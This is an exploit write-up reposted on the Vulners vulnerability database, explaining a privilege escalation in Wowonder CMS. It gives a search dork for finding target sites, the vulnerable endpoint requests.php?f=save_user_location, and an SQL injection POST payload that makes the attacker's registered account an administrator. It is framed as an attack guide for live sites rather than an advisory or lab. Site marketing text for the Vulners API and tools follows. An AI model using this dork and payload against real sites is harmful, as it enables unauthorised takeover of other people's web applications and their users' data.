Vulners
Lucene search
Wowonder CMS - Privilege Escalation Vulnerability
Today I will explain an exploit of Privilege Escalation in Wowonder CMS.
First we need firefox (v56.0.2 or earlier) and then download hackbar: https://addons.mozilla.org/es/firefox/addon/hackbar/
Note: If the bar does not appear, press F9 to make it appear and disappear.
Once everything is ready, we use the following dork, to search for pages with this CMS:
inurl: "? link1 = welcome"
Once we have set our goal, we will proceed to register and once everything is completed, what we will do is load the url in hackbar and activate the POST data, and the part of the url of the goal we add: requests.php?f=save_user_location
And in the post data part we add: lat = 0000\&lng=, admin=CHAR (49) WHERE username = CONCAT () -- 0
Between parentheses of CONCAT (), we add our converted user to MySQL CHAR, and then they give it to execute and they will have to throw the answer code 200, which means that the exploit worked, now we are going to / admin-cp and ready .
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1